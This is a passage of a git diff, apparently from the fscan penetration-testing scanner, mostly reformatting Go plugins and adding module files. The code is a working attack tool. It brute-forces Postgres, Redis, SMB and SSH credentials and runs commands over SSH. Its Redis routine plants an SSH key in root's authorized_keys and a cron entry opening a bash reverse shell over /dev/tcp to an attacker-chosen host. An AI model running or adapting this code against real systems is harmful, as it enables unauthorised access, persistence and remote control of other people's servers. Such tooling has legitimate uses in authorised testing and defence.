+ if flag == true && err == nil {
break Loop
}
}
}
wg.Done()
- <- ch
+ <-ch
}
-func PostgresConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
+func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
- Host,Port,Username,Password := info.Host, common.PORTList["psql"],user, pass
- dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host,Port, "postgres", "disable")
+ Host, Port, Username, Password := info.Host, common.PORTList["psql"], user, pass
+ dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
db, err := sql.Open("mysql", dataSourceName)
if err == nil {
- db.SetConnMaxLifetime(time.Duration(info.Timeout)*time.Second)
+ db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
defer db.Close()
err = db.Ping()
if err == nil {
- result := fmt.Sprintf("Postgres:%v:%v:%v %v",Host,Port,Username,Password)
+ result := fmt.Sprintf("Postgres:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
flag = true
}
}
- return flag,err
+ return flag, err
}
-
-
diff --git a/Plugins/redis.go b/Plugins/redis.go
index 5766f25..382ea43 100644
--- a/Plugins/redis.go
+++ b/Plugins/redis.go
@@ -1,9 +1,9 @@
package Plugins
import (
- "../common"
"bufio"
"fmt"
+ "github.com/shadow1ng/fscan/common"
"net"
"os"
"strings"
@@ -11,170 +11,166 @@ import (
"time"
)
-func RedisScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
- flag,err := RedisUnauth(info)
- if flag==true && err==nil {
+func RedisScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
+ flag, err := RedisUnauth(info)
+ if flag == true && err == nil {
wg.Done()
- <- ch
+ <-ch
return
}
Loop:
- for _,pass:=range common.Passwords{
- pass = strings.Replace(pass, "{user}", string("redis"), -1)
- flag,err := RedisConn(info,pass)
- if flag==true && err==nil {
- break Loop
- }
+ for _, pass := range common.Passwords {
+ pass = strings.Replace(pass, "{user}", string("redis"), -1)
+ flag, err := RedisConn(info, pass)
+ if flag == true && err == nil {
+ break Loop
}
+ }
wg.Done()
- <- ch
+ <-ch
}
-func RedisConn(info *common.HostInfo,pass string)(flag bool,err error){
+func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
flag = false
- realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["redis"])
- conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
- if err != nil{
- return flag,err
+ realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["redis"])
+ conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+ if err != nil {
+ return flag, err
}
defer conn.Close()
- conn.Write([]byte(fmt.Sprintf("auth %s\r\n",pass)))
- reply,err := readreply(conn)
- if strings.Contains(reply,"+OK"){
- result := fmt.Sprintf("Redis:%s %s",realhost,pass)
+ conn.Write([]byte(fmt.Sprintf("auth %s\r\n", pass)))
+ reply, err := readreply(conn)
+ if strings.Contains(reply, "+OK") {
+ result := fmt.Sprintf("Redis:%s %s", realhost, pass)
common.LogSuccess(result)
flag = true
- Expoilt(info ,realhost,conn)
+ Expoilt(info, realhost, conn)
}
- return flag,err
+ return flag, err
}
-
-func RedisUnauth(info *common.HostInfo) (flag bool,err error) {
+func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
flag = false
- realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["redis"])
- conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
- if err != nil{
- return flag,err
+ realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["redis"])
+ conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+ if err != nil {
+ return flag, err
}
defer conn.Close()
conn.Write([]byte("info\r\n"))
- reply,err := readreply(conn)
- if strings.Contains(reply,"redis_version"){
- result := fmt.Sprintf("Redis:%s unauthorized",realhost)
+ reply, err := readreply(conn)
+ if strings.Contains(reply, "redis_version") {
+ result := fmt.Sprintf("Redis:%s unauthorized", realhost)
common.LogSuccess(result)
flag = true
- Expoilt(info ,realhost,conn)
+ Expoilt(info, realhost, conn)
}
- return flag,err
+ return flag, err
}
-func Expoilt(info *common.HostInfo,realhost string,conn net.Conn) {
- flagSsh,flagCron := testwrite(conn)
- if flagSsh == true{
- result := fmt.Sprintf("Redis:%v like can write /root/.ssh/",realhost)
+func Expoilt(info *common.HostInfo, realhost string, conn net.Conn) {
+ flagSsh, flagCron := testwrite(conn)
+ if flagSsh == true {
+ result := fmt.Sprintf("Redis:%v like can write /root/.ssh/", realhost)
common.LogSuccess(result)
- if info.RedisFile != ""{
- if writeok,text := writekey(conn,info.RedisFile);writeok{
- result := fmt.Sprintf("%v SSH public key was written successfully",realhost)
+ if info.RedisFile != "" {
+ if writeok, text := writekey(conn, info.RedisFile); writeok {
+ result := fmt.Sprintf("%v SSH public key was written successfully", realhost)
common.LogSuccess(result)
- }else {
- fmt.Println("Redis:",realhost,"SSHPUB write failed",text)
+ } else {
+ fmt.Println("Redis:", realhost, "SSHPUB write failed", text)
}
}
}
- if flagCron == true{
- result := fmt.Sprintf("Redis:%v like can write /var/spool/cron/",realhost)
+ if flagCron == true {
+ result := fmt.Sprintf("Redis:%v like can write /var/spool/cron/", realhost)
common.LogSuccess(result)
if info.RedisShell != "" {
- if writeok,text := writecron(conn,info.RedisShell);writeok{
- result := fmt.Sprintf("%v /var/spool/cron/root was written successfully",realhost)
+ if writeok, text := writecron(conn, info.RedisShell); writeok {
+ result := fmt.Sprintf("%v /var/spool/cron/root was written successfully", realhost)
common.LogSuccess(result)
- }else {
- fmt.Println("Redis:",realhost,"cron write failed",text)
+ } else {
+ fmt.Println("Redis:", realhost, "cron write failed", text)
}
}
}
}
-
-func writekey(conn net.Conn,filename string) (flag bool,text string) {
+func writekey(conn net.Conn, filename string) (flag bool, text string) {
flag = false
conn.Write([]byte(fmt.Sprintf("CONFIG SET dir /root/.ssh/\r\n")))
- text,_ = readreply(conn)
- if strings.Contains(text,"OK") {
+ text, _ = readreply(conn)
+ if strings.Contains(text, "OK") {
conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename authorized_keys\r\n")))
- text,_ = readreply(conn)
- if strings.Contains(text,"OK") {
- key,_ := Readfile(filename)
- conn.Write([]byte(fmt.Sprintf("set x \"\\n\\n\\n%v\\n\\n\\n\"\r\n",key)))
- text,_ = readreply(conn)
- if strings.Contains(text,"OK") {
+ text, _ = readreply(conn)
+ if strings.Contains(text, "OK") {
+ key, _ := Readfile(filename)
+ conn.Write([]byte(fmt.Sprintf("set x \"\\n\\n\\n%v\\n\\n\\n\"\r\n", key)))
+ text, _ = readreply(conn)
+ if strings.Contains(text, "OK") {
conn.Write([]byte(fmt.Sprintf("save\r\n")))
- text,_ = readreply(conn)
- if strings.Contains(text,"OK") {
+ text, _ = readreply(conn)
+ if strings.Contains(text, "OK") {
flag = true
}
}
}
}
text = strings.TrimSpace(text)
- if len(text) > 50{
+ if len(text) > 50 {
text = text[:50]
}
- return flag,text
+ return flag, text
}
-
-
-func writecron(conn net.Conn,host string) (flag bool,text string) {
+func writecron(conn net.Conn, host string) (flag bool, text string) {
flag = false
conn.Write([]byte(fmt.Sprintf("CONFIG SET dir /var/spool/cron/\r\n")))
- text,_ = readreply(conn)
- if strings.Contains(text,"OK") {
+ text, _ = readreply(conn)
+ if strings.Contains(text, "OK") {
conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename root\r\n")))
- text,_ = readreply(conn)
- if strings.Contains(text,"OK") {
- scan_ip,scan_port := strings.Split(host,":")[0],strings.Split(host,":")[1]
- conn.Write([]byte(fmt.Sprintf("set xx \"\\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\\n\"\r\n",scan_ip,scan_port)))
- text,_ = readreply(conn)
- if strings.Contains(text,"OK") {
+ text, _ = readreply(conn)
+ if strings.Contains(text, "OK") {
+ scan_ip, scan_port := strings.Split(host, ":")[0], strings.Split(host, ":")[1]
+ conn.Write([]byte(fmt.Sprintf("set xx \"\\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\\n\"\r\n", scan_ip, scan_port)))
+ text, _ = readreply(conn)
+ if strings.Contains(text, "OK") {
conn.Write([]byte(fmt.Sprintf("save\r\n")))
- text,_ = readreply(conn)
- if strings.Contains(text,"OK") {
+ text, _ = readreply(conn)
+ if strings.Contains(text, "OK") {
flag = true
- }//else {fmt.Println(text)}
- }//else {fmt.Println(text)}
- }//else {fmt.Println(text)}
- }//else {fmt.Println(text)}
+ } //else {fmt.Println(text)}
+ } //else {fmt.Println(text)}
+ } //else {fmt.Println(text)}
+ } //else {fmt.Println(text)}
text = strings.TrimSpace(text)
- if len(text) > 50{
+ if len(text) > 50 {
text = text[:50]
}
- return flag,text
+ return flag, text
}
-func Readfile(filename string)(string,error){
+func Readfile(filename string) (string, error) {
file, err := os.Open(filename)
- if err!=nil{
- fmt.Println("Open %s error, %v", filename,err)
- return err.Error(),err
+ if err != nil {
+ fmt.Println("Open %s error, %v", filename, err)
+ return err.Error(), err
}
defer file.Close()
scanner := bufio.NewScanner(file)
for scanner.Scan() {
text := strings.TrimSpace(scanner.Text())
if text != "" {
- return text,nil
+ return text, nil
}
}
- return err.Error(),err
+ return err.Error(), err
}
-func readreply(conn net.Conn) (result string,err error) {
+func readreply(conn net.Conn) (result string, err error) {
buf := make([]byte, 4096)
for {
count, err := conn.Read(buf)
@@ -186,22 +182,22 @@ func readreply(conn net.Conn) (result string,err error) {
break
}
}
- return result,err
+ return result, err
}
-func testwrite(conn net.Conn) (flagSsh bool,flagCron bool) {
+func testwrite(conn net.Conn) (flagSsh bool, flagCron bool) {
flagSsh = false
flagCron = false
var text string
conn.Write([]byte(fmt.Sprintf("CONFIG SET dir /root/.ssh/\r\n")))
- text,_ = readreply(conn)
- if strings.Contains(string(text),"OK") {
+ text, _ = readreply(conn)
+ if strings.Contains(string(text), "OK") {
flagSsh = true
}
conn.Write([]byte(fmt.Sprintf("CONFIG SET dir /var/spool/cron/\r\n")))
- text,_ = readreply(conn)
- if strings.Contains(string(text),"OK") {
+ text, _ = readreply(conn)
+ if strings.Contains(string(text), "OK") {
flagCron = true
}
- return flagSsh,flagCron
-}
\ No newline at end of file
+ return flagSsh, flagCron
+}
diff --git a/Plugins/scanner.go b/Plugins/scanner.go
index 805d16a..4340795 100644
--- a/Plugins/scanner.go
+++ b/Plugins/scanner.go
@@ -1,14 +1,16 @@
package Plugins
import (
- "../common"
"errors"
"fmt"
"reflect"
"strconv"
"strings"
"sync"
+
+ "github.com/shadow1ng/fscan/common"
)
+
func scan_func(m map[string]interface{}, name string, infos ...interface{}) (result []reflect.Value, err error) {
f := reflect.ValueOf(m[name])
if len(infos) != f.Type().NumIn() {
@@ -22,7 +24,7 @@ func scan_func(m map[string]interface{}, name string, infos ...interface{}) (res
in[k] = reflect.ValueOf(info)
}
result = f.Call(in)
- return result,nil
+ return result, nil
}
func IsContain(items []string, item string) bool {
for _, eachItem := range items {
@@ -33,50 +35,52 @@ func IsContain(items []string, item string) bool {
return false
}
-func Scan(info common.HostInfo) {
+func Scan(info common.HostInfo) {
fmt.Println("scan start")
- Hosts,_ := common.ParseIP(info.Host,info.HostFile)
- if info.Isping == false{
- Hosts = ICMPRun(Hosts,info.IcmpThreads)
- fmt.Println("icmp alive hosts len is:",len(Hosts))
+ Hosts, _ := common.ParseIP(info.Host, info.HostFile)
+ if info.Isping == false {
+ Hosts = ICMPRun(Hosts, info.IcmpThreads)
+ fmt.Println("icmp alive hosts len is:", len(Hosts))
}
- _,AlivePorts := TCPportScan(Hosts,info.Ports,"icmp",3) //return AliveHosts,AlivePorts
- var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
- for _,port:=range common.PORTList{
- severports = append(severports,strconv.Itoa(port))
+ _, AlivePorts := TCPportScan(Hosts, info.Ports, "icmp", 3) //return AliveHosts,AlivePorts
+ var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
+ for _, port := range common.PORTList {
+ severports = append(severports, strconv.Itoa(port))
}
- severports1 := []string{"1521"} //no scan these service
- var ch = make(chan int,info.Threads)
+ severports1 := []string{"1521"} //no scan these service
+ var ch = make(chan int, info.Threads)
var wg = sync.WaitGroup{}
var scantype string
- for _,targetIP :=range AlivePorts{
- scan_ip,scan_port := strings.Split(targetIP,":")[0],strings.Split(targetIP,":")[1]
+ for _, targetIP := range AlivePorts {
+ scan_ip, scan_port := strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
info.Host = scan_ip
- if info.Scantype == "all"{
- if IsContain(severports,scan_port){
- AddScan(scan_port,info,ch,&wg)
- }else {
- if !IsContain(severports1,scan_port){
+ if info.Scantype == "all" {
+ if IsContain(severports, scan_port) {
+ AddScan(scan_port, info, ch, &wg)
+ } else {
+ if !IsContain(severports1, scan_port) {
info.Ports = scan_port
- AddScan("1000003",info,ch,&wg) //webtitle
+ AddScan("1000003", info, ch, &wg) //webtitle
}
}
- if scan_port == "445"{ //scan more vul
- AddScan("1000001",info,ch,&wg)
- AddScan("1000002",info,ch,&wg)
+ if scan_port == "445" { //scan more vul
+ AddScan("1000001", info, ch, &wg)
+ AddScan("1000002", info, ch, &wg)
}
- }else {
- port,_:=common.PORTList_bak[info.Scantype]
+ } else {
+ port, _ := common.PORTList_bak[info.Scantype]
scantype = strconv.Itoa(port)
- AddScan(scantype,info,ch,&wg)
+ AddScan(scantype, info, ch, &wg)
}
}
wg.Wait()
}
-func AddScan(scantype string,info common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+func AddScan(scantype string, info common.HostInfo, ch chan int, wg *sync.WaitGroup) {
wg.Add(1)
- if info.Scantype == "webtitle"{scantype = "1000003"}
- go scan_func(PluginList,scantype,&info,ch,wg)
+ if info.Scantype == "webtitle" {
+ scantype = "1000003"
+ }
+ go scan_func(PluginList, scantype, &info, ch, wg)
ch <- 1
-}
\ No newline at end of file
+}
diff --git a/Plugins/smb.go b/Plugins/smb.go
index b546cd7..ba38e7a 100644
--- a/Plugins/smb.go
+++ b/Plugins/smb.go
@@ -1,34 +1,35 @@
package Plugins
import (
- "../common"
+ "context"
"fmt"
+ "github.com/shadow1ng/fscan/common"
"github.com/stacktitan/smb/smb"
"strings"
"sync"
"time"
- "context"
)
-func SmbScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+
+func SmbScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
Loop:
- for _,user:=range common.Userdict["smb"]{
- for _,pass:=range common.Passwords{
+ for _, user := range common.Userdict["smb"] {
+ for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", string(user), -1)
- flag,err := doWithTimeOut(info,user,pass)
- if flag==true && err==nil {
+ flag, err := doWithTimeOut(info, user, pass)
+ if flag == true && err == nil {
break Loop
}
}
}
wg.Done()
- <- ch
+ <-ch
}
-func SmblConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
+func SmblConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
- Host,Port,Username,Password := info.Host, common.PORTList["smb"],user, pass
+ Host, Port, Username, Password := info.Host, common.PORTList["smb"], user, pass
options := smb.Options{
Host: Host,
Port: 445,
@@ -36,34 +37,33 @@ func SmblConn(info *common.HostInfo,user string,pass string)(flag bool,err error
Password: Password,
Domain: "",
Workstation: "",
-
}
session, err := smb.NewSession(options, false)
if err == nil {
defer session.Close()
if session.IsAuthenticated {
- result := fmt.Sprintf("SMB:%v:%v:%v %v",Host,Port,Username,Password)
+ result := fmt.Sprintf("SMB:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
flag = true
}
}
- return flag,err
+ return flag, err
}
-func doWithTimeOut(info *common.HostInfo,user string,pass string)(flag bool,err error){
- ctx,cancel := context.WithTimeout(context.Background(),time.Duration(info.Timeout)*time.Second)
+func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool, err error) {
+ ctx, cancel := context.WithTimeout(context.Background(), time.Duration(info.Timeout)*time.Second)
defer cancel()
- signal := make(chan int,1)
+ signal := make(chan int, 1)
go func() {
- flag,err = SmblConn(info,user,pass)
+ flag, err = SmblConn(info, user, pass)
signal <- 1
}()
select {
case <-signal:
- return flag,err
+ return flag, err
case <-ctx.Done():
- return false,err
+ return false, err
}
-}
\ No newline at end of file
+}
diff --git a/Plugins/ssh.go b/Plugins/ssh.go
index bf8c086..42bbfb9 100644
--- a/Plugins/ssh.go
+++ b/Plugins/ssh.go
@@ -1,38 +1,39 @@
package Plugins
import (
- "../common"
"fmt"
+ "github.com/shadow1ng/fscan/common"
"golang.org/x/crypto/ssh"
"net"
"strings"
"sync"
"time"
)
-func SshScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
+
+func SshScan(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) {
Loop:
- for _,user:=range common.Userdict["ssh"]{
- for _,pass:=range common.Passwords{
+ for _, user := range common.Userdict["ssh"] {
+ for _, pass := range common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1)
- flag,err := SshConn(info,user,pass)
- if flag==true && err==nil {
+ flag, err := SshConn(info, user, pass)
+ if flag == true && err == nil {
break Loop
}
}
}
wg.Done()
- <- ch
+ <-ch
}
-func SshConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
+func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
flag = false
- Host,Port,Username,Password := info.Host, common.PORTList["ssh"],user, pass
+ Host, Port, Username, Password := info.Host, common.PORTList["ssh"], user, pass
config := &ssh.ClientConfig{
User: Username,
Auth: []ssh.AuthMethod{
ssh.Password(Password),
},
- Timeout: time.Duration(info.Timeout)*time.Second,
+ Timeout: time.Duration(info.Timeout) * time.Second,
HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
return nil
},
@@ -42,19 +43,19 @@ func SshConn(info *common.HostInfo,user string,pass string)(flag bool,err error)
if err == nil {
defer client.Close()
session, err := client.NewSession()
- if err == nil {
+ if err == nil {
defer session.Close()
flag = true
- if info.Command != ""{
- combo,_ := session.CombinedOutput(info.Command)
- result := fmt.Sprintf("SSH:%v:%v:%v %v \n %v",Host,Port,Username,Password,string(combo))
+ if info.Command != "" {
+ combo, _ := session.CombinedOutput(info.Command)
+ result := fmt.Sprintf("SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
common.LogSuccess(result)
- }else {
- result := fmt.Sprintf("SSH:%v:%v:%v %v",Host,Port,Username,Password)
+ } else {
+ result := fmt.Sprintf("SSH:%v:%v:%v %v", Host, Port, Username, Password)
common.LogSuccess(result)
}
}
}
- return flag,err
+ return flag, err
}
diff --git a/Plugins/webtitle.go b/Plugins/webtitle.go
index 21d97d8..527d869 100644
--- a/Plugins/webtitle.go
+++ b/Plugins/webtitle.go
@@ -1,7 +1,6 @@
package Plugins
import (
- "../common"
"fmt"
"io/ioutil"
"net/http"
@@ -9,47 +8,48 @@ import (
"strings"
"sync"
"time"
+
+ "github.com/shadow1ng/fscan/common"
)
-func WebTitle(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) (err error, result string) {
- info.Url = fmt.Sprintf("http://%s:%s",info.Host,info.Ports)
- err,result = geturl(info)
- wg.Done()
+func WebTitle(info *common.HostInfo, ch chan int, wg *sync.WaitGroup) (err error, result string) {
+ info.Url = fmt.Sprintf("http://%s:%s", info.Host, info.Ports)
+ err, result = geturl(info)
+ wg.Done()
<-ch
return err, result
}
-
func geturl(info *common.HostInfo) (err error, result string) {
url := info.Url
- var client = &http.Client{Timeout:time.Duration(info.Timeout)*time.Second }
- res,err:=http.NewRequest("GET",url,nil)
- if err==nil{
- res.Header.Add("User-agent","Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
- res.Header.Add("Accept","*/*")
- res.Header.Add("Accept-Language","zh-CN,zh;q=0.9")
- res.Header.Add("Accept-Encoding","gzip, deflate")
- res.Header.Add("Connection","close")
- resp,err:=client.Do(res)
- if err==nil{
+ var client = &http.Client{Timeout: time.Duration(info.Timeout) * time.Second}
+ res, err := http.NewRequest("GET", url, nil)
+ if err == nil {
+ res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
+ res.Header.Add("Accept", "*/*")
+ res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
+ res.Header.Add("Accept-Encoding", "gzip, deflate")
+ res.Header.Add("Connection", "close")
+ resp, err := client.Do(res)
+ if err == nil {
defer resp.Body.Close()
var title string
body, _ := ioutil.ReadAll(resp.Body)
- re :=regexp.MustCompile("(.*)")
- find := re.FindAllStringSubmatch(string(body),-1)
- if len(find) > 0{
+ re := regexp.MustCompile("(.*)")
+ find := re.FindAllStringSubmatch(string(body), -1)
+ if len(find) > 0 {
title = find[0][1]
- }else {
+ } else {
title = "None"
}
- if len(title) > 50{
+ if len(title) > 50 {
title = title[:50]
}
- if resp.StatusCode == 400 && string(url[5]) != "https"{
+ if resp.StatusCode == 400 && string(url[5]) != "https" {
info.Url = strings.Replace(url, "http://", "https://", 1)
return geturl(info)
- }else {
- result = fmt.Sprintf("WebTitle:%v %v %v",url,resp.StatusCode,title)
+ } else {
+ result = fmt.Sprintf("WebTitle:%v %v %v", url, resp.StatusCode, title)
common.LogSuccess(result)
}
return err, result
@@ -57,6 +57,7 @@ func geturl(info *common.HostInfo) (err error, result string) {
}
return err, ""
}
+
//var client = &http.Client{
// Transport:&http.Transport{
// DialContext:(&net.Dialer{
@@ -80,4 +81,4 @@ func geturl(info *common.HostInfo) (err error, result string) {
// for k,v:=range header{
// res.Header.Add(k,v)
// }
-//}
\ No newline at end of file
+//}
diff --git a/fscan b/fscan
new file mode 100755
index 0000000..8b529ec
Binary files /dev/null and b/fscan differ
diff --git a/go.mod b/go.mod
new file mode 100644
index 0000000..26b5daf
--- /dev/null
+++ b/go.mod
@@ -0,0 +1,12 @@
+module github.com/shadow1ng/fscan
+
+go 1.13
+
+require (
+ github.com/denisenkom/go-mssqldb v0.9.0
+ github.com/go-sql-driver/mysql v1.5.0
+ github.com/jlaffaye/ftp v0.0.0-20201112195030-9aae4d151126
+ github.com/lib/pq v1.8.0
+ github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8
+ golang.org/x/crypto v0.0.0-20201116153603-4be66e5b6582
+)
diff --git a/go.sum b/go.sum
new file mode 100644
index 0000000..970e6d6
--- /dev/null
+++ b/go.sum
@@ -0,0 +1,27 @@
+github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/denisenkom/go-mssqldb v0.9.0 h1:RSohk2RsiZqLZ0zCjtfn3S4Gp4exhpBWHyQ7D0yGjAk=
+github.com/denisenkom/go-mssqldb v0.9.0/go.mod h1:xbL0rPBG9cCiLr28tMa8zpbdarY27NDyej4t/EjAShU=
+github.com/go-sql-driver/mysql v1.5.0 h1:ozyZYNQW3x3HtqT1jira07DN2PArx2v7/mN66gGcHOs=
+github.com/go-sql-driver/mysql v1.5.0/go.mod h1:DCzpHaOWr8IXmIStZouvnhqoel9Qv2LBy8hT2VhHyBg=
+github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY=
+github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0=
+github.com/jlaffaye/ftp v0.0.0-20201112195030-9aae4d151126 h1:ly2C51IMpCCV8RpTDRXgzG/L9iZXb8ePEixaew/HwBs=
+github.com/jlaffaye/ftp v0.0.0-20201112195030-9aae4d151126/go.mod h1:2lmrmq866uF2tnje75wQHzmPXhmSWUt7Gyx2vgK1RCU=
+github.com/lib/pq v1.8.0 h1:9xohqzkUwzR4Ga4ivdTcawVS89YSDVxXMa3xJX3cGzg=
+github.com/lib/pq v1.8.0/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o=
+github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8 h1:GVFkBBJAEO3CpzIYcDDBdpUObzKwVW9okNWcLYL/nnU=
+github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8/go.mod h1:phLSETqH/UJsBtwDVBxSfJKwwkbJcGyy2Q/h4k+bmww=
+github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
+golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20190325154230-a5d413f7728c/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20201116153603-4be66e5b6582 h1:0WDrJ1E7UolDk1KhTXxxw3Fc8qtk5x7dHP431KHEJls=
+golang.org/x/crypto v0.0.0-20201116153603-4be66e5b6582/go.mod h1:tCqSYrHVcf3i63Co2FzBkTCo2gdF6Zak62921dSfraU=
+golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/term v0.0.0-20201113234701-d7a72108b828/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw=
+golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
diff --git a/main.go b/main.go
index 6c65c3a..9576d1a 100644
--- a/main.go
+++ b/main.go
@@ -1,8 +1,8 @@
package main
import (
- "./common"
- "./Plugins"
+ "github.com/shadow1ng/fscan/common"
+ "github.com/shadow1ng/fscan/Plugins"
"fmt"
)